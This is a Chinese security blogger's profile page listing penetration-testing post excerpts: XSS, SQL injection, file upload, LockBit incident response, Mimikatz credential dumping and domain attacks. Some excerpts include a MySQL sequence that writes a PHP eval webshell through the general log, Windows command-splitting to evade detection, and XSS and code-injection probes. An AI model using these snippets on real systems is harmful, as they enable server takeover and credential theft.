自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(58)
  • 资源 (3)
  • 收藏
  • 关注

原创 利用EXCEL进行XXE攻击

Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是描述工作簿数据、元数据、文档信息的XML文件。此时恶意文件就做好了,找到对应的文件上传的接口,直接上传excle文件,观察dns是否有记录。添加好后重新打包成excle的后缀,如xxe.xlsx。我们创建一个excle,并解压。

2023-09-19 15:09:38 893

原创 超详细!魔改为中文sqlmap的使用教程

Sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定url的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、postgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、sybase和SAP MaxDB。Sqlmap采用了以下5中独特的SQL注入技术。基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。

2023-09-17 13:18:39 978

原创 应急响应经典案例-FTP 暴力破解

这种登录表明这是一个像类型3一样的网络登录,但是这种登录的密码在网络上是通过明文传输的,WindowsServer服务是不允许通过明文验证连接到共享文件夹或打印机的,据我所知只有当从一个使用Advapi的ASP脚本登录或者一个用户使用基本验证方式登录IIS才会是这种登录类型。从昨天开始,网站响应速度变得缓慢,网站服务器登录上去非常卡,重启服务器就能保证一段时间的正常访问,网站响应状态时而飞快时而缓慢,多数时间是缓慢的。针对网站服务器异常,系统日志和网站日志,是我们排查处理的重点。

2023-07-27 10:09:35 607

原创 浅谈文件上传漏洞

文件上传漏洞是最简单的能直接拿shell的漏洞,通常情况下,对于文件上传点,会采取两种处理方式:一种是白名单上传,即只接受特定类型的文件上传;另一种是黑名单上传,即禁止上传某些特定类型的文件。

2023-07-24 09:51:38 83

原创 说好的见框就插呢?

见框就插的原理是因为,http传参通常是通过这种方法传参的,本质是通过参数去传入xss语句,所以我们抓包对所有有参数的地方进行xss语句拼接会发现更多以前没发现的点。每一个学安全的,都听说过一句话,挖XSS就是见框就插,不得不说这个方法很有用,但是经常遇到插不进去的情况。今天浅聊一下XSS漏洞。XSS原理和注入很像,核心也是用户输入的数据被当作代码执行了,一个是插入了数据库语句,一个是插入了JS语句。分享个人经常使用的利用工具,可以屏幕截图,键盘记录,偷取cookie等操作。xss平台也很不错!

2023-07-17 16:46:35 86

原创 为什么我挖不倒sql注入啊!

听起来很呆,但是确实很有效、缺点是耗时较长,不过基本能把基础注入漏洞都测完,以本人的经验,还是第一种方法靠谱且速度较快,同个参数名尝试过没有发现注入,基本这个站80%概率以上没注入了(也有例外)不慌,大哥我从项目中发现的SQL注入漏洞给你们拿出几张注入报错截图,小白千万记住了,类似这种直接认定注入,无脑SQLMAP跑,等级设置为最高,跑出来了就是有注入,没跑出啦就是没。,没了,无论哪种类型的注入,只是用户输入的数据不一样罢了,本质都是被当作SQL执行了。那为啥会有这个漏洞呢?

2023-07-10 16:16:45 118

原创 攻防视角下的信息收集组合拳-蓝队视角

红蓝对抗中,最为重要的就是信息收集,无论是红队还是蓝队,信息收集尤为重要,本文从蓝队两个角度出发。

2023-07-03 10:53:00 241

原创 攻防视角下的信息收集组合拳-红队视角

拿到目标一般就是一个名字,没有其他信息,全部靠自己去收集,根据一些规则的不同,比如优先得分制,第一个提交漏洞的队伍获得全部分数,第二个提交的队伍获50%或者不得分的机制,以及公共目标防守单位达到一定分数出局等规则,最初的打点一定是越快越好。学会在搜索的时候做总结,去发现新的关键字,同一个目标单位的查询关键词可能有好几个,比如行业唯一性的东西,搜索别人没有搜索到的关键字,就可能发现别人没有发现的资产。,对于常规信息收集手法,不做过多描述,文章中若出现较为难懂的地方,可以私信讲解,同时欢迎大佬指正!

2023-06-28 09:55:03 451

原创 某某客户的一次勒索病毒应急响应

Lockbit在每隔被加密的目录下释放一封勒索信Restore-My-Files.txt,文件全部加密完成后,程序在桌面释放hta文件LockBit-note.hta,并为其创建注册表启动项,然后运行,弹出勒索窗口以提醒用户。最后,这个机器,只能重装系统了,客户最关心的就是有没有横向移动,入侵的原因是什么,入侵的时间,只要找到这些,基本就能交差,后续我便溜了,现场事情基本完成。美好的周六刚开始,眼睛一睁,领导就发消息,说某客户中了勒索病毒,特别着急,让我赶过去,于是就有了这篇文章。(2)及时升级更新补丁。

2023-04-11 11:29:43 868 4

原创 windows命令执行的几种绕过方法

反检测、反清理,是红队攻击中的重中之重,本文详细描述了几种windows执行命令的几种绕过手法。set a = net user //设置变量a,值为1 echo a //此时输出结果为"a" echo % a % //此时输出结果为net userset a = net u //设置变量a,值 set b = ser //此时输出结果为"a" echo % a % % b % //此时输出结果为net user。

2023-04-11 11:05:03 1073

原创 电脑桌面app客户端、微信公众号-小程序测试方法

电脑桌面app客户端、微信公众号-小程序测试方法

2023-04-10 17:45:26 1133

原创 暴力破解之验证码识别

渗透测试过程中,现在验证码越来越多,这对测试的时候遇到的阻力不小,一位大佬给我安利了一个burp插件,Captcha-killer,可以自动对验证码进行识别,从而进行暴力破解。验证码识别是使用了python的开源验证码识别接口ddddocr模块。使用burp抓包,把验证码的包发到Captcha-killer模块。本地尝试一下运行脚本,出现下面信息,代表运行成功。下载好Captcha-Killer模块,选择生成器,这样就可以进行暴力破解啦。【下载不了的,我把安装包放到文末】回到插件,点击获取验证码。

2023-04-10 14:20:38 3379 3

原创 Centos7搭建MSF6(公网服务器搭建msf)

每次需要用msf测试的时候,都需要用frp把msf穿透出来,麻烦的很,索性直接把他搭建到公网服务器上,实验机为centos,网上教程非常杂乱,中途遇到很多问题,花费了大量时间解决了遇到的问题,文章非常详细,并记录下来,照着文章一步步操作,可以完美搭建。

2023-03-15 17:50:40 1834 4

原创 ProcDump+Mimikatz绕过杀毒软件抓密码

如果主机上装了杀毒软件,开了防火墙,例如:360、火绒之类的话。Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或者免杀难度会比较大,那有办法去解决这个问题吗?答案是肯定的,那就是ProcDump+Mimikatz绕过杀毒软件抓密码。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用。导出lsass.dmp文件后,使用猕猴桃读取密码hash。读取对方内网机器密码。

2023-03-02 15:28:20 857

原创 App防抓包的四种绕过方法(详细)

平时做app渗透的适合,是不是经常会遇到burp抓不到包的问题,本文梳理了一些APP抓不到包的解决思路

2023-03-02 11:06:27 13995 3

原创 burp联动xray进行被动扫描

本文详细介绍了xray与burp进行联动的方法,被动扫描和手工测试双管齐下快速出洞,在burp上配置xray代理,将burp流量转发给xray扫描,这样便可坐收漏洞了4、不是在piliang目录下,而是在xray.exe的目录这

2023-03-02 10:37:02 881

原创 JAVA代码审计篇-SQL注入

1、SQL注入攻击是黑客利用SQL注入漏洞对数据库进行攻击的常用手段之一。攻击者通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,网站应用程序未经过滤,便将恶意SQL语句带入数据库执行。2、SQL注入漏洞可能会造成服务器的数据库信息泄露、数据被窃取、网页被篡改,甚至可能会造成网站被挂马、服务器被远程控制、被安装后门等。3、SQL注入的分类较多,一般可笼统地分为数字型注入与字符串型注入两类;当然,也可以更加详细地分为联合查找型注入、报错注入、时间盲注、布尔盲注等。

2023-03-01 16:17:02 702

原创 常见响应状态码

常见状态码

2022-07-24 09:36:11 190

原创 ATT&CK红队评估实战靶场(一)

2021-10-30 22:20:08 190

原创 hashcat使用方法

2021-04-26 09:53:45 2097

原创 Android开发环境搭建

2021-01-21 16:23:00 152

原创 数据库学习笔记

数据库学习文章目录数据库学习前言一、表的定义与操作二、增删改查三、联合查询四、索引六、视图七、存储过程练习八、存储过程九、触发器十、权限管理总结前言要成为IT行业的精英,数据库学习不可落下,经过一段时间的学习,基本掌握了数据库的大部分知识。一、表的定义与操作二、增删改查三、联合查询四、索引1.2.3.4.创建删除:5.6.7.二、1.2.3.4.5.六、视图七、存储过程练习八、存储过程九、触发器

2021-01-21 14:37:47 215

原创 C # +Visual Studio2010-学习笔记

C sharp+Visual Studio2010学习笔记文章目录C sharp+Visual Studio2010学习笔记前言1.输出第一条语句2.插入图片3.实现简单的html编程4.访问网页计数器&&聊天室5.验证控件6.数据库控制7.实操8.文件夹打开显示操作9.综合实战练习总结前言C#是由C和C++衍生出来的一种安全的、稳定的、简单的、优雅的面向对象编程语言。它在继承C和C++强大功能的同时去掉了一些它们的复杂特性(例如没有宏以及不允许多重继承)。C#综合了VB简单的可

2021-01-21 14:21:50 468

原创 python白帽子学习笔记(整合)

python学习笔记()整合学习笔记目录python学习笔记()整合前言一、基础篇1.正则表达式2.列表3.元组带上了枷锁的列表4.奇葩的内置方法5.格式化字符6.序列7.定义函数8.内嵌函数和闭包9.lambda表达式10.递归是什么?11.汉诺塔12字典13.集合14.打开文件15.异常总结二、模块篇1.os模块2.pickle模块3.random模块4.异常处理5.if esle语句的连用、输入和输出6.easygui模块的安装7.类和对象的特点7.1类的内置函数8.魔术方法time模块8.1定义一

2021-01-21 13:54:56 2351 8

原创 域渗透——哈希传递、黄金票据

域渗透1.安装域接着点击安装向导加入域:需要设置dns服务器为域控机域控可以登陆任意域中的电脑Windows认证协议 - Kerberos,也可以叫做票据我们查看域控 在cmd输入net user /domain还可以在dns里查看,一般dns都是域控机当我们获取到了administator的权限的时候,我们可以利用windows官方的工具去提权指令:psexec -i -d -s cmd.exe//获取权限然后再次输入net user /domain,就可以获取域

2020-06-30 22:30:21 836

原创 猫舍内网靶场

内网渗透我们首先先讲一下,如何去利用sql注入漏洞先讲两个导出文件的函数into dumpfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径into outfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径但是一般都用不了这两个函数,他和loadfile()一起的,如果能用loadfile() ,那代表这两个函数也能用原因是:mysql.ini的配置问题,要手动添加一个配置select 1,2,

2020-06-28 22:33:16 1299

原创 SQL语句利用日志写shell

SQL语句利用日志写shelloutfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%'; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为shell地址4.select ‘<?php eval($_POST[cmd]);

2020-06-24 13:38:30 287

原创 谷歌高级语法

谷歌搜索语法

2020-06-15 08:39:42 770

原创 基本工具NETCAT—NC

基本工具NETCAT—NCnc的基础命令,nc命令详解-g<网关>:设置路由器跃程通信网关,最多设置8个;-G<指向器数目>:设置来源路由指向器,其数值为4的倍数;-h:在线帮助;-i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口; -l:使用监听模式,监控传入的资料; -n:直接使用ip地址,而不通过域名服务器; -o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存; -p<通信端口>:设置本

2020-06-11 19:04:24 286

原创 Linux常用命令大全(非常全!!!)

Linux常用命令大全(非常全!!!)最近都在和Linux打交道,感觉还不错。我觉得Linux相比windows比较麻烦的就是很多东西都要用命令来控制,当然,这也是很多人喜欢linux的原因,比较短小但却功能强大。我将我了解到的命令列举一下,仅供大家参考:系统信息arch 显示机器的处理器架构uname -m 显示机器的处理器架构uname -r 显示正在使用的内核版本dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI)hdparm -i /dev/hda 罗列一个磁盘

2020-06-10 15:13:10 254

原创 越权漏洞

越权漏洞原理:越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。目前存在着两种越权操作类型:横向越权操作(水平越权)和纵向越权(垂直越权)操作。越权一般分为水平越权和垂直越权。

2020-06-03 09:53:26 547

原创 虚拟机问题之旅

这次,我不小心卸载虚拟机软件,重新安装的好过后出现的一系列问题,无法启动和安装虚拟机还有各式各样的报错,这让我一度很崩溃,终于在几个小时的研究下,找到了解决方案在使用,把这次经历分享给大家1.一开始,在开启虚拟机时,弹出提示以独占方式锁定此配置文件失败我首先在打开的Windows任务管理器窗口中,找到并选中Vmware的进程,然后点击下面的“结束进程”按钮在弹出的询问是否要结束Vmware进程的窗口中,点击“结束进程”按钮,然而!!在我打开虚拟机的时候,依然是这个弹窗!好了,我开始在度娘

2020-06-02 21:10:00 245

原创 十条nmap常用的扫描命令

十条nmap常用的扫描命令NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包。nmap是在网络安全渗透测试中经常会用到的强大的扫描器。功能之强大,不言而喻。下面介绍一下它的几种扫描命令。具体的还是得靠大家自己学习,因为实在太强大了。1) 获取远程主机的系统类型及开放端口nmap -sS -P0 -sV -O这里的 < target > 可以是单一 IP, 或主机名,或域名,或子网-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关

2020-06-02 12:37:17 1016

原创 bluecms灰盒测试

bluecms代码审计思路:寻找功能点\我们安装好bluecms1.重复安装漏洞我们直接再次访问install发现可以重复安装!1.这代表,我们能破坏网站2.可以进入后台我们可以实施站库分离,我们没用改管理员的账号密码,改了数据库的连接地址网站,内网比外网弱,后台比前台弱我们知道他在php5.5以上在可以执行在双引号中出现这个就**${}**就会被当做代码执行如:<?phpecho "${phpinfo()}";?>我们在安装的时候数据库名字进行一句话木马

2020-05-31 15:11:03 588 3

原创 CSRF—跨站请求伪造

CSRF—跨站请求伪造原理:csrf漏洞的成因就是网站的cookie在浏览器中不会过期,伪造信任用户的请求,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)1.我们打开靶场,发现是一个CMS,由于我们知道后台路径,所以我们直接进入后台登陆界面输入账号密码,进入后台然后我们点击文件管理器,点击新建文件这时,我们打开burp,在修改文件的时候,利用

2020-05-30 15:33:55 266 3

原创 Dom型XSS—漏洞

Dom型XSS—漏洞原理:让原本不存在Xss的地方出现Xss,利用native编码去替换js语句,让前端认为这个js语句安全我们首先在各个框框内插入<script>alert(1)</script>结果页面崩溃,再次访问发现被拦截了,于是我们尝试绕过,在url栏输入/index.php/1.txt成功绕过,继续输入<script>alert(1)</script>发现没有出现弹窗,可能不存在Xss漏洞接着我发现,在URL栏上的传参和页面上

2020-05-28 10:26:41 762

原创 文件上传的20种骚方法

文件解析漏洞黑名单绕过第一题:我们查看源代码,发现不准上传 .jpg .png .gif后缀名的文件于是,我们制作一个图片木马制作成功我们利用burp的抓包工具,去获取数据包修改上传文件的后缀名为.php发现文件上传成功进入图片链接,发现果然是一个php码利用菜刀进入成功进入后台第二题:同样是是上传文件,但是前端检测点不同我们同样制作图片码,利用burp抓包,修改文件后缀名为php,一样能拿下服务器第三题:我们查看图片源代码我们发现他们把以.asp .aspx .ph

2020-05-27 12:13:37 597

原创 存储型XSS—漏洞

存储型XSS—漏洞原理:嵌入到web页面的恶意HTML会被存储到应用服务器端,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码我们先进入靶场很明显它是一个CMS,我们第一反应就是有没有通杀啊百度搜索我们先在本地搭建一个FineCMS搭建好过后,我们查看百度上找到了通杀漏洞文章找到URL栏上的数据,我们提取出来index.php?c=mail&m=test尝试在本地搭建的进行测试查看后台错误日志成功得到执行,接着我们进入Xss平台

2020-05-25 10:05:52 960

原创 反射型XSS—漏洞

反射型XSS—漏洞原理:利用javascript语句,进行XSS拼接网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML)1.我们输入<script>alert(1)</script>在框内寻找输出点,发现在源代码里找到了两个输出点,但是第一个输出点它把<>实体化了,没有<>的显示但是第二个就不一样了![在这里插入图片描述](https:/它的<>都没有被实体化,存

2020-05-25 10:02:28 1616

原创 Oracle注入——报错注入

Oracle注入——报错注入原理:同MYSQL数据库差不多,但是一些语法不同,相比其他数据库,Oracle数据库的数据类型更加严谨,由于过度严谨,所以,我们用显错注入,会比较麻烦,于是,我们利用报错的方法,忽视数据类型,直接获取数据CTXSYS.DRITHSX.SN(user,())Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY那么要它有什么用妮?它实际上是为了满足查询语句的结构而产生比如你想查询你的用户名 select user from Dual

2020-05-20 08:42:22 1319 2

app防抓包绕过工具包

App防抓包的四种绕过方法(详细)文章配对工具包 frida-serverx86 adb 9a5ba575.0证书 JustTrustMe.apk Postern-3.1.2.apk

2023-03-02

tomcat-weak-password-scanner

扫描tomcat弱口令

2023-03-01

C-SHARP学习资料.zip

C-SHARP学习资料.zip

2021-01-21

御剑网站根目录扫描.zip

网站根目录探测,暴力破解目录工具原理暴力破解web目录,一般是利用字典通过构造url来匹配web目录,成功则返回http代码200

2020-05-12

Layer根目录探测.rar

作为一名渗透测试人员,或者说一个漏洞赏金猎人,一般情况下,当您进行安全测试时,您将获得一个或一组域名。您必须进行广泛的信息搜集,以找到有用的信息,如服务器,Web应用程序,属于目标组织的域等,从而增加您找到漏洞的机会。

2020-05-12

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除